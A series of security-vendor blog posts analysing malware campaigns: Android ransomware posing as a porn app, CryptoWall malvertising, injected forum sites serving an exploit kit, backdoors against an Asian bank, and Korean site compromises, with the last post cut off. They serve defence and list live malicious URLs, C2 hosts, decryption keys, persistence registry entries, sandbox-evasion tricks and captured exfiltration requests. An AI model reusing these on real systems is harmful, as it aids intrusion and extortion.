We have all read about the cryptolocker malware that encrypts the victim’s data and then ask for ransom money for helping to decrypt the data; We have also heard many real-life stories where politicians and mafia have blackmailed people in order to “persuade” them into doing something.  If you think that you are safe from blackmailing because you are neither a politician or nor in organized crime, think again. CyphortLabs started seeing Android malware that combines blackmail tactics into ransomware design in order to extort money out of you. Back in July this year, an android ransomware named FBI/Lock started to emerge . CyphortLabs analyzed two samples which we believed to be a new variant of this family.

This article shares some findings from our analyses of two such samples:

The following are the samples analyzed:

     MD5                                                               Source url                                                                     

bd4ed8b3b5d37f34fb63ce2798c585e9   http://kjkobll.girlamus18.com/p1/pornvideo.apk

1c2c8894ab12a38b7420c7e04ed690f3  http://vfaywnaul.yagirls18.us/pornvideo.apk

 What is it about?

The apps poses as a porn application. It displays the following videos which entices the user and thinks that he just installed a porn app. 

But, it isn’t the case. After a few seconds, it will eventually display the following on your screen from “The FBI” saying that your phone is locked for containing pornographic materials with children which violates the law. To scare you more,  it threatens that your face is captured with evidences of violation and that it is now uploaded to FBI Datacenter. In order for you to be clear of this violation, it ask you to pay a penalty of $500 within 3 days. It instructs you to pay through Moneypak.

Worse is, the above message will remain and will take over your whole screen even if you press home or exit which makes your phone unusable. It also presents evidences for violating the law  with your phone details and your picture with it if exist.

Upon installation, it will ask the user to install it as a device administrator. This will make the malware harder to remove as you will need to remove it in device administrators before you can uninstall or delete the app.

When you cancel, it will send an intent that will display again the device administrator activation forcing you to it.

It also ask for permission to encrypt data. Such that, when you try to disable the device administrator it has another trick that returns a string that says all your data will be reset.

Although it has some code that encrypts and decrypts data, that function doesn’t seem to be called elsewhere. This likely means the malware is still under development and that it is going in the direction of being the cryptolocker of android. It uses a simple AES encryption which is way simpler than the cryptolocker of windows using asymmetric encryption. Also the AES key is hardcoded in the app which can be easily reversed.

What is happening on the background?

The OnCreate() method of the Main activity will retrieve contacts and post it to its CnC server. For these 2 samples, it will post it to the following servers:

• http://megaapipack.com/api/app.php
• http://servicemanapi.com/api/app.php

It also retrieve the following details:

• IMEI
• Email
• Network information
• Phone information and model
• Country

It  will also capture your picture by activating the front face camera which it saved under the folder CameraData777.

How does it lock your phone?
It registers a background service that continuously locks your screen via WebView. First, it sets an alarm of 30 seconds which will activate the service that locks your screen. That 30 second window is probably to make you think the phone is not doing any abnormal activity. After that 30 seconds, it launches the service in which it start a WebView layout which enables the app to load HTML page from the app without calling the browser. The service will load a local html page found on the assets folder named index.html.

Suspicious Manifest

This app declares a lot of dangerous permissions.

android.permission.READ_EXTERNAL_STORAGE

android.permission.RECEIVE_BOOT_COMPLETED

android.permission.INTERNET

android.permission.SYSTEM_ALERT_WINDOW

android.permission.ACCESS_NETWORK_STATE

android.permission.WAKE_LOCK

android.permission.GET_TASKS

android.permission.WRITE_SETTINGS

android.permission.CAMERA

android.permission.READ_PHONE_STATE

android.permission.WRITE_EXTERNAL_STORAGE

android.permission.READ_CONTACTS

android.permission.GET_ACCOUNTS

The SYSTEM_ALERT_WINDOW  permission will allow the application to show system-alert window which can take over your screen. This is an early clue that it is a ransomware. RECEIVE_BOOT_COMPLETED enables the app to start on boot.

It also uses random names for its classes and has an autostart receiver.

What can you do if you are infected with this ransomware?

The normal uninstall and delete doesn’t work for this kind of app because your phone is locked and it is installed as device administrator. It requires that you restart your phone in safe mode. By restarting in safe mode, only the basic apps gets started. Go to Security Settings and locate the Device Administrator page. Remove the malware app from device administrators. Now you can uninstall the app and reboot your phone in normal mode.

 Key Takeaways

Given that a lot of cybercrimes are following the money, it is a matter of time to see ransomware like cryptolocker to go from targeting Windows users to targeting Mac users, and to go from desktop to smartphones. However, this style of malware that combines blackmail tactics into ransomware design represents a more significant advancement in malware threat, which we refer to as “ransommail” malware. Several features of this malware are worth noting:
-It is a ransomware in that it holds the victim’s reputation for ransom
-It is blackmail in that it threatens the victim with the legal consequence of viewing porn
-It is a different kind of social engineering attack in that it exploits human vulnerability – curiosity and pride for reputation
-It combines fraudulent representation (being from FBI) with privacy-invasion means on the smart phone (captured personal identification information and photograph) in the blackmail act

Given the increasing population of Android phone users, we are abound to see more of such malware attacks. Users should be careful to only download mobile apps from trusted apps stores, and watch what their apps are doing on their phones.

Users are advised to:

• Do not install apps from untrusted sources. It is preferably safer to install apps from known reputable sources like the Google Play Store.
• Have certain level of protection. We all know that antivirus softwares cannot catch all the bad stuff but having antivirus installed is much better than having no level of protection at all.
• Monitor your running apps and processes. Most of the time, a normal user won’t monitor the running apps in his/her device but you might find something in there that you think shouldn’t be running and probably malware. A quick google search of the app name or the package name of the app installed will give you a hint if its bad or not.
• Do not install apps as device administrators unless you are sure they are clean and safe.
• Pay attention to permissions. When you install a simple app which you think that has no camera functions, retrieving contacts or access to SMS but asks for such permissions, that is already a red flag.

I would like to thank Fengmin Gong and the rest of CyphortLabs team for helping me with this report.

The post Ransommail: Ransomware Mobile Twist With Blackmail appeared first on Cyphort.

On February 4, 2015, Cyphort Labs detected another malvertising campaign originating from gopego.com.  The site displays a malicious advertisement that redirects to other malicious links and eventually downloads CryptoWall ransomware.  

The attack serves an exploit package embedded in a flash file, including exploits which target four vulnerabilities. Among them the notorious CVE-2015-0311 which hit affyield.com a few days back.

Fig.1: iframe redirecting to the flash EK

Exploit Analysis

The initial flash file essentially is an exploit package. It is used as a platform to deliver other exploits embedded in the flash file. As seen before, the initial flash exploit (MD5: 31710b3fe36943bd5273d4fb0f0efa85) is obfuscated and loads a second stage flash file using loadBytes(). During the second stage, it stores a flash parameter (rtConfigEncodedString) to an RC4-encrypted JSON file. The key used is ‘vukocwgsos142160’. This JSON file contains the list of URLs to the binary payload along with the RC4 keys used to decrypt these binaries.

The second stage flash uses ExternalInterface.call() to inject Javascript into the browser DOM and requests various properties of execution environment.

It has several exploits embedded as binary data, in encrypted and compressed form. Based on the environment, it chooses an appropriate exploit and decrypts it using RC4, and decompresses it if necessary. The decryption key used  is “florbgd622662”. Once the chosen exploit is decrypted, depending on the vulnerability to exploit it is either injected via HTML/JS into the browser DOM or loaded as third stage SWF file.

The screenshot above shows binaries which exploit the following vulnerabilities:

After successful exploitation, the shellcode downloads an RC4-encrypted binary over the network which it decrypts using the key  “fxfdaxrrax“.

Cryptowall 3.0 downloaded over the network

Payload

MD5: 0cffee266a8f14103158465e2ecdd2c1

The final payload is a variant of Cryptowall version 3.0 (also known as Crowti). Similar to its predecessor, it uses RSA-2048 algorithm to encrypt files on the hard disk. It also drops the following already well known files in each of the affected directories. These files contain instructions on how to pay the ransom.

Once it finished encrypting files, the malware visits the url http://paytoc4gtpn5czl2.torpaysolutions.com/hkmxYL and demands victims to pay US$500 using Bitcoin in order to receive the decryption key that allows them to recover their files. It also displays a countdown of 168 hours (7 days) to pay the ransom. If the victim does not obey, the price will increase to  USD $ 1,000 after the countdown.

Instruction on how to pay the ransom using bitcoin

The ransomware program provides users with links to several Tor gateways leading to CryptoWall decryption services hosted on the Tor network.

There have been reports also that this new version of cryptowall use I2P (Invisible Internet Project) anonymity networks to carry out communication between victims and controllers to hide from researchers and law enforcement officials.

We have seen this malware connect to following CnC servers:

• asthalproperties.com:4444
• pratikconsultancy.com:8080

It retrieves the victims IP address by visiting ip-addrs.es.

Cyphort Labs has seen malvertising campaigns on the rise. They continue to be the favorite delivery method of threat-actors to deliver drive-by-download attacks. With every discovery of a zero-day exploit, actors are rapidly taking advantage and update their kits to deliver malicious binaries more reliably. It is always advisable to take precautionary measures when surfing the web and patch software to the latest available version.

Special thanks to McEnroe Navaraj, Alex Burt and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post Malvertising on Indonesian portal gopego.com delivers Cryptowall 3.0 appeared first on Cyphort.

Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites.  They are powered by outdated software so the vulnerability was likely used to compromise them, injecting the malware redirection code. The injection redirects to an exploit kit that downloads encrypted Gamarue malware that is sandbox-aware (does not execute in virtual environments).  As of Apr 8, 2015 the campaign is still ongoing. We analyzed one of the infection chains below, which happens to have minimal detection on Virus Total.

On April 6, 2015 Diychatroom.com was redirecting users to Fiesta Exploit Kit. It delivers a multi-stage binary payload that involves several malware families.  

 The affected websites include:

• www.Diychatroom.com
• www.dogforums.com
• www.e-cigarette-forum.com
• www.excelforum.com
• www.goldenretrieverforum.com
• www.horseforum.com
• www.loverslab.com
• www.ps3news.com
• www.scubaboard.com
• www.visajourney.com
• www.wranglerforum.com
• www.wrestlingforum.com
• and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums by using a big number of generic domain names they acquired over the past decade. VerticalScope has over 400 websites with combined reach of more than 80 Million unique visitors per month.

 Diychatroom.com Infection

The infection chain is as follows:

This EK is heavily obfuscated but after several layers of deobfuscation, it clearly reveals what it tries to do. It exploits the following vulnerabilities: 

• CVE-2013-2551 (IE)
• CVE-2015-0313 (Flash)

                                                            _{CVE-2013-2551}    

               _{First layer of flash using LoadBytes() to load second layer}

                     _{Second layer flash. CVE-2015-0313}

 Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

Payload

The payload arrives encrypted over the network. This is a multi-stage malware that involves two files  obtained from its resource  and one file downloaded. 

• 77f22bfc9cf7e46c6e738d8b68ad19f6   - Main Dropper
• c091894cd23d49a14d5cabf0d60c379c  – Gamarue
• 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
• 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

Main Dropper

The main dropper is armored and will not executed in a virtual environment. 

Armoring:

• anti-virtualbox
• anti-qemu
• anti-vmware

It checks the presence of string VBOX, QEMU and VMWARE from the return of SetupDiGetDeviceRegistryPropertyW.

Under non-virtual system, it drops 2 files obtained from its resource in the %TEMP% folder and execute it via CreateProcess or ShellExecute.

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new process of msiexec.exe and injects code into it. It drops a copy of itself in %ALLUSERPROFILE% using random filename, e.g., “mssffnmc.exe”. 

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

Value: {random}

Data : %ALLUSERPROFILE%\{copy of itself}

Disables some Windows security settings by changing the value of the following registry entries:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Value: “EnableLUA“

Data: “0“

 

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Value: “TaskbarNoNotification“

Data: “1“

Value: “HideSCAHealth“

Data: “1“

 

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Value: “Hidden”

Data: “2″

It connects to its CnC server, nindziaboy.net to send data and receive commands. Communication to the server is encrypted and depending on the reply, it can perform the following commands:

• Report 
• Update
• Start

It also performs DNS request to the following domains:

• africa.pool.ntp.org
• oceania.pool.ntp.org
• asia.pool.ntp.org
• south-america.pool.ntp.org
• north-america.pool.ntp.org
• europe.pool.ntp.org

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

This malware’s main purpose is to open several hidden IE instance that access websites. 

Similar to the main dropper, it exits and do nothing if it detects it is running under virtual environment.

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then it creates a service for itself with name as “SystemUpdate”.

It injects to either, iexplore.exe, chrome.exe, firefox,exe, explorer.exe to gain elevated privilege and tries stop the following services:

• SharedAccess
• wscsvc
• MpsSvc
• WinDefend
• wuauserv
• BITS
• ERSvc
• WerSvc

It creates five threads that fire a hidden Internet Explorer Browser that visits the following URLs:

• http://videosearcher{.}org/4ff9ae/9126
• http://truesearchresults{.}com/?aff=7733&saff=9126

 _{Created several hidden IE that visits a url}

Afterwards, the following network connections were observed:

^{GET /analytics.js HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: www.google-analytics.com}

^{Connection: Keep-Alive}

^{GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: counter.yadro.ru}

^{Connection: Keep-Alive}

Additional details:

Creates mutex with the following name:

•  _HSJ909NJJNJ90203_

Connects to the following urls to get geolocation of the victim’s machine.

• www.telize.com/geoip

 If it detects that it is running on a 64-bit system, it will load its 64-bit counterpart that is found in its resource.

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

This file is downloaded from the following link:

• http://clenodium{.}eu/tmp/file{.}exe

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random.exe}

It creates a new process of wuauclt.exe and injects into it.  It contacts the following CnC server and wait for commands:

• dobavki-shop.com

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: dobavki-shop.com

Connection: Keep-Alive

 

Apparently from the above CnC request, it sends system information in clear text, including:

• MachineGuid
• OS version
• Display device (monitor) name

It waits for the following commands from the server.

• #none – do nothing
• #stop
• #update – update self
• #update_miner
• #opencl
• #destruct – kill self
• #error
• #download  – Download files

The server evaluates the information received from the infected computers and replies back with any one of the above listed commands. When the trojan is executed in a virtual environment (or sandbox) it chooses to stay low and replies with command #none.

 Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are also infected with this same malicious attack.  These forum sites are powered by vBulletin  or by IP Board.

Early this year, Sucuri blog reported a serious vulnerabilty affecting vBSEO that allows an attacker to remotely execute malicious PHP code on your website. vBSEO is a component of vBulletin but it was already discontinued due to several vulnerabilities. The sad fact is that some websites still use it. 

For website administrators affected by this attack, Sucuri posted the following options:

1. Completely remove vBSEO from your site – It is not supported anymore
2. Apply the patch recommended by the vBulletin team
3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

 For visitors of forum sites, ensure that you are running the latest version of browsers and flash as this attack involves IE and flash exploits.

Connecting Dots

For the curious threat researchers out there, you may wonder why the armored malware completely avoided all three popular virtualization environments (VirtualBox, Qemu, and Vmware), not even Vmware which is a fairly popular platform adopted by many businesses?  Indeed Cyphort Labs have seen malware samples which singled out VirtualBox and Qemu for evasion, but was happy to play inside Vmware.  In those cases, the objective of armoring design seems to be anti-analysis or anti-sandboxing.  As we have mentioned earlier, this malware campaign has targeted over a hundred forums which seem to be serving mostly individual home users. As we saw from the attack payload (TrojanClicker.FleerCivet) earlier, it is part of a click fraud campaign.  For a click fraud to look legitimate, it better come from home users, so how many home users’ machines would actually run VirtualBox, Qemu, or Vmware?  Very few.  So we believe that this malware pack is designed for click fraud campaign and for distribution using watering hole attacks.  The armoring against all the virtualization environments is done to avoid detection by anti-click-fraud systems.

 Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post DIY Chatroom and over a hundred forums injected with malware appeared first on Cyphort.

Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company name anonymous. The source said, initial entry of the attack is a spear phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware exhibits anti-sandbox properties and includes protection against heuristic signatures commonly used by anti virus companies. The various malware samples also show a common theme, like installing themselves in the %ProgramFiles% or in the %UserProfile% folder depending on whether the user has admin privileges or not. Additionally, the majority of the malware samples are compiled with Borland Delphi with their strings encrypted and API strings either obfuscated or divided into several strings as protection against heuristic signatures. None of the samples are packed except for one.

Based on the file creation date of the files, it appears the attack started as early as January 2015 and lasted for three months. 

Summary of samples used in this attack

Technical Analysis

GoogleUpdate.exe

The file structure of the file is not common as we see on prevalent malware today. Why? because most AV products today employ heuristic based detection that detects packed samples and samples with an uncommon file structure. This malware is not packed and sections resemble a normal file.

Strings are encrypted and will only be decrypted right before use.  The malware also divides its APIs into several strings. This is also to avoid heuristic signatures that detect strings and suspicious APIs.

It drops a copy of itself in %Pr0gramFiles% folder if user is admin and %UserProfile% folder if not

If admin:

• %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

• %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with a service name of “SENSS”.  

After checking that it is successfully running as a service, it checks if the parent process is explorer.exe or iexplore.exe . If so, it will load its dll file from its data section. This dll is encrypted via XOR with 0x89 as key. Otherwise, it will enumerate processes and find services.exe and injects its dll.

Anti-Sandbox

Detects Sleep Acceleration

To defeat a sandbox, this malware delays execution  through sleeps or loops because it knows a sandbox system will execute the the malware for a short limited amount of time. By contrast, once inside your system, the malware has the luxury of time to perpetrate its malicious intent. To defeat this, sandbox systems employ acceleration, that is if they detect that a sample uses a delay, it will accelerate it. For example, if it detects the sample sleeps for 1 minute it will change it to sleep for 1 second. Unfortunately, for this malware, this technique will not work. It is able to detect sleep acceleration by issuing a sleep and gets the time elapsed after that and checks if the  time elapsed is lower than the time of sleep.

Detects API hooks

Sandbox systems also hooks APIs to tell the behavior of a file. This malware detects hooks by checking if the first instruction of a certain API is a jmp, call or a push-retn. It checks if the start byte of an API address is either of the following bytes:

• E8
• E9
• EB
• FF
• 68????????C3 (push retn)

Payload

The injected code is a backdoor that communicates to the following C&C servers:

• bbs.gokickes.com:80
• img.lifesolves.com:8080
• domain.gokickes.com:443

Depending on backdoor commands, this malware is capable of the following

• Download and execute additional files 

• Capture Screenshots
• Capture Mouse and keyboard events

• Update itself
• Opens remote shell
• Terminate Process
• Enumerate Network Shares
• Enumerate Drives
• Uninstall itself

Lastly, all data sent and received from server is encrypted with XOR key 0xD5

mslives.exe

This sample has similar file structure as GoogleUpdate.exe but it doesn’t employ similar anti-sandbox tricks.

When first ran, it sleeps for 300 seconds before doing its installation routine.  Afterwards, it creates a copy of itself as follows:

• %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy however as written with large garbage of data at the end of the file that balloons its file size to more than 100MB. It writes to this file 100KB of data 1000 times. There are two things this behavior tries to evade sandbox. First,  this malware however does not create a copy of itself technically which makes this malware’s behavior unusual and may appear to sandbox as benign behavior. The usual malware behavior is to create an exact copy of itself. Second, the multiple writing event might exceed the sandbox limit and the file size of the dropped copy will make it unsuspecting for the sandbox.

It executes its dropped copy using CreateProcess then checks if it is running as iexplore.exe, if not, it will create a suspended process of iexplore.exe and injects its code into it by overwriting to iexplore.exe’s main module.

It creates a hidden windows with window name and class name “111111”. 

It then creates an autostart registry entry below to let it run at every startup.

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Valuue: msliveupdate
  • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

Payload

This sample has only one purpose and that is to download and execute a file downloaded from forum.energymice.com.

_{GET /view/login.asp HTTP/1.1}

_{Content-Type: */*}

_{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)}

_{Host: forum.energymice.com}

_{Cache-Control: no-cache}

It downloads the file in the %TEMP% folder and executes it. Unfortunately, at the time of our analysis, the download URL is not returning any binary.

winhost.exe

Unlike the other files this one is clearly packed. PEiD identifies the packer as follows:

• ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR” as we found this string in its body. We also found other interesting strings which indicates the protector used.

• HDoor, Version 1.0
• Copyright (C) 2013
• (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

This is a backdoor  that listens to port 143 and waits for the client to connect and issue commands. Port 143 is the default IMAP non-encrypted port. IMAP or (Internet Message Access Protocol)  is a mail protocol used for accessing email on a remote web server from a local client.

It checks if the user is admin or not.  If the user is admin, it will install itself as a service and drops a copy in the following directory:

• %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not admin, it will install itself as follows and creates an autostart key entry in the registry.

• %USERPROFILE%\System\winhost.exe

Autostart Registry Entry:

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: Microsoft Messenger
  • Data: %USERPROFILE%\System\winhost.exe

Payload

It is capable of performing the following depending on the attacker’s command.

• Disconnect
• Get backdoor install path
• List directory or files
• Type a txt file content
• Execute A Program
• Download A File
• Get A CMD Shell
• Exit CMD Shell
• Upload a file
• Download a file
• Load dll library
• Free dll library

nethost.exe

Install a copy of itself as follows depending if the user is admin or not:

If user is admin:

• %ProgramFiles% \common files\system\library\nethost.exe

Installs itself as a service:

• HKLM\System\CurrentControlSet\Services\ncoglsse
  • DisplayName = Microsoft Wireless Device Service
  • ImagePath = %ProgramFiles% \common files\system\library\nethost.exe

If not admin:

• %USERPROFILE% \system\library\nethost.exe

It creates the following autostart key

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: “ncoglsse”
  • Data: %ProgramFiles%\common files\system\library\nethost.exe

After installation, it will inject to lsass.exe to stay memory resident and execute its payload.

Payload

It downloads from the following URLs

• http://hud321.astringer.com/images/log.gif
• http://grop.waterglue.org/images/logg.gif
• http://hud.astringer.com/images/log.gif

The content of the downloaded files are encrypted URLS that it uses to connect to its C&C. The malware connects to this URL using HTTP POST and sends the following information.

• IP address
• Language ID
• Malware version
• OS version
• Machine name

It receives commands from the C&C and it is capable of the following:

• Collect information about the drives and folders on your PC
• List Files

• Download files
• Terminate Processes
• Open CMD shell

Shell64.dll  

Shell64_u.dll – Loader Component

The loader component runs as a service, loading the espionage component and makes sure the infection keeps intact. The service, including the service name, is to be configured by the malware dropper, which is not known at the time of writing. Strings embedded in the loader component suggest the binary is packed with the Dyamar binary protector, but the binary does not leave the impression of being thoroughly protected.

Simple obfuscation elements, induced by macros and a number of obfuscated strings show attempts of complicating the analysis but are easily bypassed. Also the binary comes with three dummy exports, which show more of the obfuscation elements. Interestingly, the binary keeps a log file, located under C:\debug.txt, where debug messages are written to. This is rather uncommon for binaries found in the wild.

The ServiceMain method will direct execution to one of the exports, either ‘LoadFunc’ for Windows OS versions below 6.0, or to ‘win7load’ for 6.0 and above. Said exports load the espionage component, running it via a spawned rundll32.exe process with the according parameters set. This second stage binary exports two functions, ‘main’ and ‘lowmain’, which are again suited for OS versions below and above 6.0.

Shell64.dll – Espionage Component

The espionage component comes with the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above, while lowmain serves versions below 6.0. Just like the loader component this binary creates and maintains the file C:\debug.txt where debugging information is written to.

During startup shell64.dll creates a named mutext, dubbing it ‘Global\\KongQi [TickCount]’, where TickCount is the actual time stamp at the time of infection. Also the malware creates a named view which is used to exchange runtime information among threads and intruded processes, dubbed ‘_kaspersky’. The name is doubtlessly chosen to add stealth.

During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

• Hostname
• System CPU power
• OS version
• Drive geometry for PHYSICALDRIVE0
• Global memory status
• Video capture driver description
• Installed security products based on running processes list

Security Product Enumeration

The list of products to be searched for is long:

The following firewall installations will also be enumerated:

• Norton Personal Firewall        
• ZoneAlarm                       
• Comodo Firewall                 
• eTrust EZ Firewall              
• F-Secure Internet Security      
• McAfee Personal Firewall        
• Outpost Personal Firewall       
• Panda Internet Seciruty Suite   
• Panda Anti-Virus/Firewall       
• BitDefnder/Bull Guard Antivirus
• Rising Firewall                 
• 360Safe AntiArp

Espionage Capabilities

Once the malware is all set up and running it waits for instructions from the remote servers. Its capabilities are plenty, and are all designed to steal data from the infected system. Spied information is compressed with the deflate algorithm and sent to a remote server. A list of analyzed functions is as follows:

• Video Captures using a capture window named CVideoCap while compressing the video using the Windows VCM API (Video Compression Manager)
• Sound captures from the system’s sound input device, i.e. microphone
• Stealing data from the current desktop’s clipboard, which can yield passwords from password managers
• Capture screenshots and compress them, exfiltrate as a stream
• The sample includes a userland keylogger, setting a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’, created within the Windows system directory
• Clear event logs for ‘Application’, ‘Security’ and ‘System’, which is usually done to erase forensic evidence of an intrusion
• Shut the system down, which eventually forces a reboot
• Create a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
• Download files and execute them
• Execute other binaries from disk
• Enumerate files and file attributes on the system, modify and deletie files and directories
• Enumerate window names of opened applications
• Enumerate system attributes like OS version, CPU power or memory capacities of the disk, system up time, number of processors, names of running processes while matching for security products, computer name, user name of current user, attached drives

• Enumerating parameters for dial-up connections, such as phone number and device name
• Enable terminal services and allow remote connections
• Pop message boxes
• Open a socket for sending and receiving data
• Delete its files and persistence mechanisms from the machine, i.e. uninstall the service and remove an auto-run registry key located under [HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’; it is unclear though, how this key is created in the first place

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the according dropper. The service name remains unclear, as it is also set by the dropper. However, the malware comes with the capability to inject its payload to remote processes and contains a function to inject to winlogon.exe (in Windows versions prior to 6.0).

dllhost.exe

This malware does not do much. It only tries to download from blog.softfix.co.kr:80.

Who’s behind?

The attacker used C&C servers that are registered in Korea with registration records looking fake. Some of the C&C servers are also owned by hugedomains.com which is a company that sells previously owned domains and have a service that hides the information. We also noticed that based on the strings in the binary, it’s clear that it does not come from native English speaker.

Whois Records of C&C used

Malware doesn’t need to be advanced to be effective

These malwares are not advanced and they are also the family of malware we have seen before yet they were able to infiltrate and bypass security. The malware were able to reside unnoticed for three months which gives the attacker plenty of time to operate. This proves that malware doesn’t need to be advanced or sophisticated to be able to get through.  

AV is still our best defense, they block majority of security events, it’s just that there are too many malware attacks with various techniques that there is no single security security solution that will stop all these attacks. That is why we need multiple security solutions and we need security people in our respective organizations.

Why spear phish?

The initial entry of the malware is a spear phishing email that targets one of the head of the company.  According to a report from TrendMicro, spear-phishing is still the most favored APT attack bait. They said that “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails. “

It is easy for the attacker to guess email address of people  in organization especially if they are high-ranking officials as their names are available online. The attackers can easily profile them by searching any available info online. This makes the attacker customize their attack according to the profile of the target.

As proven, attackers usually target the weakest point and more often, the weakest point is the people in our organization. This is a message that to protect our organization, we must also educate and train all the people within our organization for proper security practices so as not to fall with these types of social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack. 

The post Multiple Malwares used to Target an Asian Financial Institution appeared first on Cyphort.

On September 18, 2015, we saw an activity on koreatimes.com where we captured a malicious binary. We investigated further and found that this campaign is specifically targeted to Korean sites and Korean banks. 

We looked at our logs for this year and found more Korean websites infected:

• koreatimes.com (Sep. 18, 2015)
• filehon.com(May 30, 2015)
• joara.com (May 3, 2015)
• hometax.go.kr (May 3, 2015)
• soriaudio.co.kr (April 23, 2015)
• gomsee.com (March 16, 2015)
• lottoplay.co.kr (Feb 6, 2015)
• insight.co.kr (Jan 31, 2015)
• filecity.co.kr (Jan 23, 2015)
• nggol.com(Jan 6, 2015)
• koreamanse.com(Jan 6, 2015)

The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server. This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site. It also targets Ahnlab by killing processes and deleting files specific to the software. Ahnlab is a popular antivirus software in South Korea.

                                                              Infection Flow

Website Infection

This following analysis will focus on the infection that took place in koreatimes.com

The culprit is a javascript file named “2013_gnb.js” which is an iframe injector leading to KaiXin EK landing page.

It exploits the following vulnerabilities:

• CVE-2014-6332 (IE)
• CVE-2011-3544 (Java)
• CVE-2015-0336 (flash)

We found interesting strings on the flash file which gives us an idea about the attackers platform on building its exploit and references to the attacker. Also an interesting string “King Lich V” was found on the flash file which  is likely the author’s signature. That string was found also found in other attacks involving Chinese group. Flash file was also packed using DoSWF.

Once the exploitation is successful, it has two options to execute its payload.  If it is running in Windows 7 or 8, it will fire a powershell script that will download an executable file from 199[.]188[.]106[.]161.

